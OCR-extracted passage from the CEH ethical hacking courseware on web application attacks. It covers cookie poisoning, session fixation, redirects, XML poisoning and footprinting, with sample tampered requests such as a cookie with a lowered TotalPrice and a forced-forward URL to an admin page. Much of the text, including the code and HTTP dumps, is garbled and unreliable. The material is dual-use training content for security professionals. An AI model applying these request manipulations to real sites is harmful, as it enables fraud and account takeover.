A buffer has a specified data storage capacity, and if the count exceeds the original, the buffer overflows; this means that buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are developed to maintain finite data; additional information can be directed wherever it needs to go. However, extra information may overflow into neighboring buffers, destroying or overwriting legal data.
A rbitrary Code
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application is damaged. An attacker can then send specially crafted input to the web application, so that the web application executes the arbitrary code, allowing the attacker to successfully take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in the memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, the attacker who recognizes a potential buffer overflow can access a staggering array of products and components.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
V ulnerable Code
i n t m a in (in t a rg c, char * d e s t_ b u ffe r ; d e s t_ b u ffe r = (ch ar *) m a llo c (lO ); if (NULL = = d e s t_ b u ffe r ) char * a r g v [ ] ) {
re tu rn 0;
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17:
Buffer Overflow Attacks.
Module
13 Page 1804
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C ookie/Session Poisoning
CEH
Urt>fW4 I itkitjl Nm Im
Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms A
Poisoning allows an attacker to inject the malicious content, modify the user's online experience, and obtain the unauthorized information
A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie
C o o k ie /S e s s io n P o is o n in g
Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's on-line experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember m e?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Threats The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account in order to assume the identity of other users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access that the vulnerable web application provides are open for the attacker to exploit. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure. It can be one of these four variants. Persistent cookies are stored on a disk and non-persistent cookies are stored in memory. Secure cookies are transferred only through SSL connections.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Web server replies with requested page and sets a cookie on the user's browser
GET /stor^buy.aspx?checkout*yes HTTP/1.0 Host www.juggyshop.com Accept: / Referrer: http://www.juggyshop.com/showprods.aspx Cookie: SESSIONID*325896ASDD23SA3587; BasketSlze3; lteml1258; Item2=2658; Item36652; TotalPrlce*100;
A tta c k e r
Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.
H o w C o o k ie P o i s o n i n g W o r k s
Cookies are mainly used by web applications to simulate a stateful experience depending upon the end user. They are used as an identity for the server side of web application components. This attack alters the value of a cookie at the client side prior to the request to the server. A web server can send a set cookie with the help of any response over the provided string and command. The cookies are stored on the user computers and are a standard way of recognizing users. All the requests of the cookies have been sent to the web server once it has been set. To provide further functionality to the application, cookies can be modified and analyzed by JavaScript. In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits to the web server. The server then accepts the attacker's request and processes it.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
The following diagram clearly explains the process of a cookie poisoning attack:
GET /store/buy.* spx?checkout-yesHI IP/1.0 Host: www.juggybhop.com Accept: */* Referrer: http://www.juggyshop.com/showprods.dspxCookie: SESSIONID-32b896A$DD23SA3587; BasketSize-3;lteml-1258; ltem2-2658; ltem3-6652; TotalPrice-11568;
A Webserver
Webserver replies with requested page and sets a cookie on the user's browser
GET /store/buy.aspx?checkout=yes HTTP/1.0 Host: www.juggyshop.com Accept: */* Referrer: http://www.juggyshop.com/showprods.aspx Cookie: SESSIONID-325896ASDD23SA3587; BasketSize=3; lteml-1258; Item2=2658; I t e m36652 ; TotalPrice-100;
Attacker
FIGURE 13.25: How Cookie Poisoning Works
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S e s s io n F ix a tio n A tta c k
In a session fixation attack, the attacker tricks the user to access a genuine web server using an explicit session ID value
CEH
Attacker assumes the identity of the victim and exploits his credentials at the server
Attacker logs on to the bank w ebsite using his credentials Web server sets a session ID on the attacker's machine
Server
(juggybank.com) Attacker logs into the server using the victim's credentials w ith the same session ID
Attacker
Attacker sends an email containing a link with a fix session ID
|1 g o
A A
h t t p : / / ju g g y b a n k .d o m / lo g in . ja p ? s e s s io n id = 4321
I t
User
User logs into the server using his credentials and fixed session ID
S e s s io n F i x a t i o n A t t a c k s
Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then lures the victim to use the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user validated session with the knowledge of the used session ID. The session fixation attack procedure is explained with the help of the following diagram:
Attacker logs on to the bank w eb site using his credentials W ebserver sets a session ID on the attacker's machine
Server
Attacker logs into the server using the victim's credentials w ith the sam e session ID
Attacker
Attacker sends an email containing a link with a fix session ID
(juggybank.com)
h t t p : / / ju g g y b a n k .d o m / lo g in . j s p ? s e s s io n id = 4321
User clicks on th e link and is redirected to the bank w eb site User logs into the se rve r using his credentials and fixed session ID
User
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks
This vulnerability exposes user's data to untrusted third parties and can lead to account theft
In s u ffic ie n t T ra n s p o rt L a y e r P ro te c tio n
SSL/TLS authentication should be used for authentication on the websites or the attacker can monitor network traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted or data can be intercepted, injected, or redirected. Various threats like account thefts, phishing attacks, and admin accounts may happen after systems are being compromised.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Information Gathered
e Out of memory Null pointer exceptions System call failure
lo o
httpy/j uggyboy.conV
Boy .1
General Error
Could not obtain post/user Information DEBUG MODE SQL Erroc: 1016 Can't open file: 'nuke_bbposts_text.MYO'. (errno: 14S) SELECT u.username, u.u serjd, u.user_posts, u.user_from, u.user_webs!te. u.user_ema 1l, u.usermsnm, u. use r_vl ewe mail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.postjext, ptpost_subject pt.bbcode.uid FROM nuke_bbposts p, nuke_usersu, nuke_bbposts_text pt WHERE p.topicJ d 1 54 7 'AND pt.postJd p.postJd AND u.userjd =p.posterjd ORDER BY p.post.time ASC LI MIT 0, I S Line: 43S File:/user/home/geeks/www/vonage/module s/Forums/vi ewtope.php
Database unavailable Network timeout S e Database information Web application logical flow
9 Application environment
e l
Improper error handling may result in various types of issues for a website exclusively
related to security aspects, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details related to the network version, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. Improper error handling may allow an attacker to gather information such as: e e e 0 Q e e Out of memory Null pointer exceptions System call failure Database unavailable Network timeout Database information W eb application logical flow Application environment
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
!.
j!
In s e c u re C ry p to g ra p h ic S torage
W eb applications use cryptographic algorithms to encrypt their data and other
sensitive information that is transferred from server to client or vice versa. The web application uses cryptographic code to encrypt the data. Insecure cryptographic storage refers to when an application uses poorly written encryption code to securely encrypt and store sensitive data in the database. The insecure cryptographic storage mentions the state of an application where poor encryption code is used for securely storing data in the database. So the insecure data can be easily hacked and modified by the attacker to gain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials with appropriate encryption or hashing to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data. The following pictorial representation shows the vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Session ID in URLs
http://juggyshop.com/sale/saleitems=30 4;jsessionid120 MTOIDPXMOOQSABGCK LHCJUN2JV?destNewMexico
Password Exploitation
Attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every users' password
Attacker sniffs the netw ork traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes
B ro k e n A u th e n tic a tio n a n d S e s s io n M a n a g e m e n t
Authentication and session management includes every aspect of user authentication and managing active sessions. Yet times solid authentications also fail due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken related to user authentication. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.
Session ID in URLs
1
An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Urt1fw4 ilhiul lUtbM
Unvalidated Redirect
User
Malicious Server
Unvalidated Forward
Attacker requests page from server with a forward http://www.juggyshop.com/purch . ase.jsp?fwd=admin.jsp
loo
Administration Page
^ I t Create price list Attacker is forwarded to admin page Q Create item listing
B6_____
Server
* 1 Purchase records
3 Registered users
Attacker
U n v a lid a te d R e d ire c ts a n d F o rw a rd s
An attacker links to unvalidated redirects and lures the victim to click on it. When the
victim clicks on the link thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to installation of malware and even may trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass leading to: 0 0 Session Fixation Attacks Security Management Exploits Failure to Restrict URL Access Malicious File Execution
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Unvalidated Redirect
User is redirected to
attacker's server
Attacker
User
Unvalidated Forward
Administration Page
Attacker requests page from server with a forward
http://www .juggyshop.com/purch ase.jsp?fwd=admin.jsp Create price list Create item listing
* 1 Purchase records
3 Registered users
Attacker
Server
F IG U R E 13.28: U n valid ated Redirects and Forw ards
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
(rtifwtf itfciul Nm Im
X M L , SOAP, W SD L, S ch e m a , W S - A d v e rtis in g , e tc .
.Net TCP Channel, Fast InfoSet, etc.
WSWork Processes
W S Security
WS-SecureConversion WS-Trust
XML Encryption
:1
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
U ilifM
C EH
IU mjI NMhM
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^1 ^ e b S ervices A ttack
W eb services evolution and its increasing use in business offers new attack vectors in an application framework. W eb services are process-to-process communications that have special security issues and needs. W eb services are based on XML protocols such as W eb Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services that are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are: Q An attacker injects a malicious script into a web service, and is able to disclose and modify application data. An attacker is using a web service for ordering products, and injects a script to reset quantity and status on the confirmation page to less than what was originally ordered.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Crt1fW 4 itfciul Nm Im
XM L Query
POST /inquire HTTP/1.1 C ontent Type: text/xm l; charset=utf-8 SOAPAction: Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.m iaosoft.com Accept: text/htm l,im age/gif, im ag e/jp eg /; q=.2, / ; q=.2 Connection: keep-alive Content-Length:229 <?xml version1.0 " " encoding " UTF-8" ?> <Envelop xmlns="h ttp://scem as.xm lsoap.org/soap/envelop/"> <Body> <find_business generi c2. 0": "maxRows"50" xmlns="urn"uddiorg:api_v2"xnam e>am azon</nam e></find_business> </Body> </Envek>p> HTTP/1.1 50 Continue
XM L Response
HTTP 200 1.1 OK Date: Tue. 28 S e p 2004 10:07:42 GMT Server: Microsoft !IS6 .0 X-Powered-By: A S P .N E T XAspNet-Vers-oo 1 1 4322 Cache-CortroJ: private, max-age=0 Content-Type: text/xml: charsot-utf 8 Contenl-Length: 1272 <?xm l versk>n=*l.0 encodir>g= utl- 8,'? >< 80ap:E nv 0l0p 0 xmlnssoap-'bttp /schemas xmlsoap org/soap/onvolopor xmlns:xsi-"hltp://www.w3.or0/2001XMLSchom a instance' xm1n8:xsd* hnp://www.w3.org/2001/XMLSchema,'><8oap:Bodyx8erv1ceList generic-^.O" operator-*Microsoft Corporation* truncated-"false" xmlns- ,urn:uddi-org:apl_v2<>servicelnfos><servicelnfo seYiceKey=*6ec464eO-218d-4dafb4dd-5dd4ba9dc8l3" businessKey=*9l4374tb-M01-4834-b8efc9c3408a0ce5*><namo xml lang-*on-us"> ^nam ox/sorvicolnloxsofvicolnlo $0fvic0K0y-*4 1213238 1b33 4014 8756 c89cc31250CC businossKoy-"bfb9dc23adoc-4173bd5f 5 54 5abacaalb"xnam c xml:lang-"en-us"> </namcx/scrviceln10xscfvicelnk> serv!ceKeyba6d9d56-a3M263-a95a-eebl 7e59l Odb" businessKey="18b71de2-dl 5c-437c-8877ebec82t6d0f5 x n a m e xml:lang=*en"> </namc></servicelnloxserviceln10 ser/iceKeybc82a008-5e4e4cOc-8dba-c5e4e268le12" busines8Key18785586-295e-448a-b759Cbb44a049t21x n a m o xm1.1ang=*on*> </name></servicolnfoxservicelnfo serviceKey-8faa80ea-42dd4cOd*8070999ce0455930" businessKey-"ee41518b-bf99-4a66-9e9ec33c4c43db5a*xname xH1 l:lang*en'> </name></servicelnlo><7serviceln10s></serviceList><;soap:Body><.'soap:
^
^ ^
W e b S e r v i c e s F o o t p r i n t i n g A tta c k
Attackers use Universal Business Registry (UBR) as major source to gather information
of web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. It is somewhat similar to a "W hois server" in functionality. To register web services on UDDI server, business or organizations usually use one of the following structures: Q Q e Business Entity Business Service Binding Temple Technical Model (tmodel)
Hence, attackers footprint a web application to get UDDI information such as businessEntity, businesService, bindingTemplate, and tModel.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
XML Query
POST/inquire HTTP/1.1 Content-Type: text/xml; charset=utf8 SOAPAction: " Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/glf, image/jpeg,*; q=.2, /; q=.2 Connection: keep-alive Co nte ntLe ngth:229 <?xml version="1.0" encoding="UTF-8 " ?> <Envelop xmlns="http://scemas.xmlsoap.org/soap/envelop/"> <Body> <find_businessgeneric="2.0" maxRows"50" xmlns="urn"uddi0rg:api_v2 "xname>amaz 0n</namex/find_business> </Body> </Envelop> HTTP/1.1 SO Continue
XML Response
HTTP?1.1 200 OK Date: Tue, 28 Sep 2004 10:07:42 GMT Server: Microsoft-IIS'6.0 X-Powered-By: ASP NET X-AspNet Version: 1.1.4322 Cache-Control: private.axage-0 Content-Type: text/xm l: cnarset-ut(8 Content-Length: 1272 <?!tml version1.0- "encoding="utf-8"?xsoap:Envelope xmlns:soap nttp://schemas.xmlsoaporg/soap/enveloper xrnlns:xsi" h ttp ://www.w3.org/2001/XMLSchema instance" xmlns:*sd http^AMWw.w3.org/2001/XMLSchema"><soap:BodyxserviceList generic^"2.0" operator" Microsoft Corporation" truncated" false'' xmlns" um:uddi-0rg:api_v2xservicelnfosxserviceln1o servjceKey=6ec464eO-2f8d-4dal-b4dd-5dd4ba9dc8f3 businessKey-91 4374fb-f10f-4634-b8elC9e34e8a0ee5'xname xml:lang='en-us"> </namex/servicelr1toxserv1celnto serviceKey=41213238-1 b33-40f4-8756-c89cc3125eoc" businessKey=bfb9dc23-adec-4(73-bd5f5545abaeaa1b'xname xml:lang="en-us"> </namexfeerviceln10xserviceln10 serviceKeyT>a6d9d56-ea3f-4263-a95a-eeb176591 Odb businessKey-"18b7fde2-d15c-437c-8877ebec8216d015'xname *1 ang-'en"> </namex/serv1 celnt0 xservicelnk> serv.ceKey"bc82aO08-5e4e-'1cOc-8dba-c5e4e268fe 1 businessKey-" 18785586-295e-448a-b759ebb44a049f21">cname xml:lang="en"> </namex/servicelnf0 xservcelnf0 serviceKey-8faa80ea-42dd-4c0d-8070-999ce0455930"businessKey-'ee41518b-b(99-4a66-9e9ec33c4c43db5a'xname *a5 1 lang.en> </name></servicelnfox/servicelnlos></serviceUst></soap:Bodyx'soap:
2 "
^ p w e io p o
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XML Request
<CustomerRecord> <CustomerNumber>2010</CustomerNumber> <FirstName>Jason</FirstName> <LastName>Springfield</LastName> <Address>Apt 20, 3rd Street</Address> <Email>jason@springfield.com</Email> <PhoneNumber>6325896325</PhoneNumber> </CustomerRecord>
W e b S e rv ic e s X M L P o is o n in g
XML poisoning is similar to a SQL injection attack. It has a larger success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to alter parsing mechanisms like SAX and DOM that are used on the server. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u l e F lo w
So far, we have discussed web application components and various threats associated
with web applications. Now we will discuss web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.
Security Tools
Countermeasures
^ 1S1
Hacking Methodology
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
# n ^
< n >
W e b A p p H a c k in g M e th o d o lo g y
In order to hack a web application, the attacker initially tries to gather as much
information as possible about the web infrastructure. Footprinting is one method using which an attacker can gather valuable information about the web infrastructure or web application.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Web infrastructure footprintingis the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications
Server Identification
Grab server banners to identify the make and version of the web server software
Service Discovery
Discover the services running on web servers that can be exploited as attack paths for web app hacking
Server D iscovery
In server discovery, when there is an attempting to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-
Service D iscovery
Discovers the services running on web servers that can be exploited as attack paths for web app hacking. The service discovery searches a targeted application environment for loads and services automatically.
Server Identification
Grab the server banners to identify the make and version of the web server software. It consists of: Q Local Identity: This specifies the server Origin-Realm and Origin-Host.
Local Addresses: These specify the local IP addresses of the server that uses for Diameter Capability Exchange messages (CER/CEA messages).
Self-Names: This field specifies realms to be considered as a local to the server, it means that any requests sent for these realms will be treated as if there is no realm in the specified request send by the server.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
DNS Interrogation provides inform ation about the location and typ e o f se rve rs DNS In terrog atio n Tools: 9 http://www .dnsstuff.com http://network-tools.com 8 http://e-dns.org http://www.dom aintools.com
Port Scanning attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server Port Scanning Tools:
9 8
0 6
F o o tp rin t W eb I n f r a s tr u c tu r e : S e rv e r D is c o v e ry
In order to footprint a web infrastructure, first you need to discover the active servers on the internet. Server discovery gives information about the location of active servers on the Internet. The three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
W hois Lookup
f3 ): Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. This produces the result in the form of a HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup Tools are: e http://www.tamos.com http://netcraft.com http://www.whois.net http://www.dnsstuff.com
e e
0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly connected, then it is very easy to exploit it and gather required information for launching the attack on the target organization. This also provides information about the location and type of servers. Some of the tools are: http://www.dnsstuff.com http://network-tools.com http://e-dns.org http://www.domaintools.com
m m
Port Scanning
Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intrude into
B U I
the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Some of the tools are: Nmap NetScan Tools Pro W hatsllp Portscanner Tool Hping
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Port
Typical HTTP Services World W ide W eb standard port Alternate W W W Kerberos SSL (https) IBM Websphere administration client Compaq Insight Manager
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Compaq Insight Manager over SSL Microsoft Application Center Remote management BEA Weblogic BEA Weblogic over SSL Sun Java W eb Server over SSL Alternate W eb server, or W eb cache Alternate W eb server or management Apache Tomcat Sun Java W eb Server admin module Netscape Administrator interface
TABLE 13.1: Service Discovery
You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser. Source: http://nmap.org Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also define different services running on the web server and give detailed information about the remote computers.
Zenmap
Scan Target: Tools Profile Help Scan Cancel
L=hJ
Command:
Nmap Output Ports/Host! Topology | Host Details | Scans j OS < Host .9 google.com (74.12 # # < Port * Protocol * State < Service * Version SO 113 443 tcp tcp tcp open closed open http ident https
C
Filter Hosts
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
F o o tp r in t W e b I n f r a s t r u c t u r e : S e r v e r Id e n tific a tio n /B a n n e r G ra b b in g
CEH
Urt1fw4 ilhiul lUtbM
Analyze the server response h ead er field to iden tify the make, m odel, and version of the w e b se rve r softw are This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications
C : \ t e ln e t w w w . ju g g y b o y . com
80
H EAD
H T T P / 1 .0
H T T P/1 .1 2 0 0O K
sJt-CooklT*Cp5cis:CNIDTC0e0-PBLPKEK0N0<:K0FFIP0CHPLNE i
Via: 1.1 Application aid Content N etw orking System Software 5.1.15
n n e c tlo n t o h ot lo s t .
B a n n e r grab b in g to o ls:
1. Telnet
2. Netcat
3. ID Serve
4. Netcraft
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
HTTP/l.1 200 O K ^ ________________________ Server identified Server: Date: Thu. 07 Jul 2005 13:08:16 G M T as Microsoft IIS Content-Length: 1270 Content-Type: text/html sit-CookieTASPESsf0NIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path/ Via: 1.1 Application and Content Networking System Software 5.1.15 Connection: Close Connection to host lost. C:\>
:
F IG U R E 13.33: S e rv e r Id en tification /B an n er Grabbing
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application
It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.
Copyright by
W eb S p id erin g
W eb spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover the hidden content by means of web spidering include: Q Q OWASP Zed Attack Proxy Burp Spider WebScarab
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
B rute F o rcin g
Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
(rtifwtf itfciul Nm Im
in tru d e ra tta c k1
payioaqs | options
com m ent
!re o u e s r
w cosovce* w o e * ?0 0
2 payweq poam ona
OCT / t b ? l d H ^ W 'r ' H9t: t9 - l.M t.b ln s .n e t P ro x y -c c n n c c c io tu ic e c p - 1 m U w - A j- n t: M o x tllA /S .a (Utnclowx NT t . 2; IfOWM) AppLeWebK1t/S3'J.') iKITOJL, Like Cecko) 1 ::9 .3 a
1 0 4 4 3 .
lencnn 4 6 *.
n ^ <
OTT / t h 7 1 d - l . 4M 7C 150040::3 U [1 id l , I H T T P /I. I P xo x y -C o n n tc tio n : kwp-l.Lve 1 lM t lg * n e : K o x ilW S .O (Window* NT C. 2 ; V0V) A p p l *b K lt/5 1 7 . {KBTHL, lik e Oeeko) Chrowe/22.0. i2 29.9 l Srttor 1 /S 3 7 . 1 Accept: / M ttrtn h t t p : / / rf r f.3ainy.c0BV U *y s/ia 1:ch? q-blk*i11 id CCC770<SClCPJA9P:SA,SS9<J 5ir1C575D1:594*POPH-rcrRBA A ccvp t-Z n co d in g : JTip, d * f lu te , aclch Accept-lancrua{re: en-US, en: ct8 .0 ic c e p t- C fta r a e t: JSO -88S S-l,uc-8;r=0.7, '; q * 0 .3
-hrone/^i.u. Iccvpt: /*
Satar1 / 6 3 7 .4
RZxx: h t t p : / / * w . b in g . c ocV inwicjv!/ it o c c M q-b i \c~*l id-CCC7'70 6 SCICD3 A5D2 EABE0 6351PE0S7SD 12 S54tP ORN-1OPRBA A c c e pt-E nco ding : rjz 1p, d e l l a t e , sdeti
| 0m atches
Copyright by
2. Access the entire target application visiting every single link/URL possible, and submit all the application forms available 3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled 4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
5.
7 * ____________
f
attack type
2 payload positions
GET /th?id=SI458766150048223 ISipid=5115 HTTP/1.1 Host: ts4.mm.bing.net Proxy-Connection: keep-alive User-Agent: Hozilla/5.0 (Vindovs NT 6.2; OV64) AppleVebKit/537.4 (KHTML, like Gecko) Chrome/22..1229.94 Safari/537.4 Accept: */* Referer: http://wwv.bing.com/images/3earch?qbike3 4id*6CCC7670 65ClCD3A9D2EABE86351FE8575D12594&FORM=IQFRBA Accept-Encoding: gzip,deflate,sdch
J 0 matches
intruder attack 1
attack save columns
Filter showing all items results request target ' positions [ payloads ' options position payload status sfc 200 error time... length 10443 193 10443 comment baseline request
Web Service Attack 400 Web Service Attack. 200 request [ response raw |params | headers j hex
